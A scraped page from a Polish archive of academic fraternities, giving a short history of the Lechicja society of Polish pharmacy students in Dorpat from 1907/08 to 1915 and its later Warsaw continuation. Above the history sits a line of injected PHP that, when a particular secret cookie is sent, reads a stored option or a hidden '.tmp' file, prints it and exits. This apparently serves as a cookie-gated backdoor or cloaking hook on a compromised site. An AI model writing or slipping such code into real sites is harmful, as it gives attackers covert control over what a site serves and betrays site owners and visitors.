if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Lechicja

Nazwa:
Towarzystwo “Lechicja”
Siedziba:
Dorpat, od 1921 r. Warszawa
Data powstania:
1907 r. (1908 r.)
Barwy:
?
Dewiza:
?

Rys historyczny

Tablo Lechicji, Dorpat 1910 r.

Lechicja powstała w końcu 1907 r. bądź w początkach 1908 r. jako stowarzyszenie polskich studentów farmacji w Dorpacie. Stanowiła do pewnego stopnia kontynuację założonej w 1897 r. przez grupę studentów farmacji korporacji akademickiej Znicz, która po rewolucji 1905 r. zaprzestała działalności, a ostatni jej członkowie przekazali majątek korporacji nowoutworzonej Lechicji.

Choć Lechicja zachowywała niektóre powszechnie przyjęte tradycje korporacyjne, nie postrzegała się jako korporacja akademicka, ale raczej jako polskie narodowe stowarzyszenie o celach patriotycznych, samopomocowych i naukowych. Towarzystwo stawiało sobie jako zadanie wychowywać swych członków zgodnie z hasłem “bądź dobrym Polakiem”, a jednocześnie wpływać na podnoszenie kwalifikacji zawodowych przyszłych farmaceutów. Warto dodać, że członkami dorpackiej Lechicji byli nie tylko mężczyźni, ale także - co było wówczas ewenementem - kobiety.

Tablo Lechicji, Dorpat 1915 r.

Towarzystwo prowadziło szeroką działalność: wspólną kuchnię, czytelnię pism i książek, muzeum przyrodnicze, podręczną pracownię analityczną, utworzyło kasę wzajemnej pomocy, urządzało odczyty, pogadanki, kursy naukowe i obchody świąt narodowych. W 1912 r. wydało także “Przewodnik po Dorpacie. Informator dla młodzieży wybierającej się na studia do Dorpatu”. Lechicja utrzymywała bliskie kontakty z innymi polskimi związkami akademickimi w Dorpacie: Lutycją, Kołem Teologów oraz Zjednoczeniem. W 1915 r., w drugim roku I wojny światowej, Lechicja zaprzestała działalności w Dorpacie. Znajdujący się w Petersburgu Lechici podjęli jednak decyzje, które pozwoliły na zabezpieczenie archiwum, biblioteki i majątku związku. W II Rzeczypospolitej tradycje dorpackich Znicza i Lechicji kontynuowała działająca od 1921 r. w Warszawie K! Lechicja.

Ustalona, niekompletna imienna lista członków Lechicji za okres 1907/08-1915 obejmuje ponad 100 nazwisk. Na stronie Archiwum znajduje się ona w zbiorczym zestawieniu w części poświęconej warszawskiej K! Lechicja.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 27 XI 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Towarzystwo “Lechicja” w Dorpacie, (na:) www.archiwumkorporacyjne.pl, stan 27 XI 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }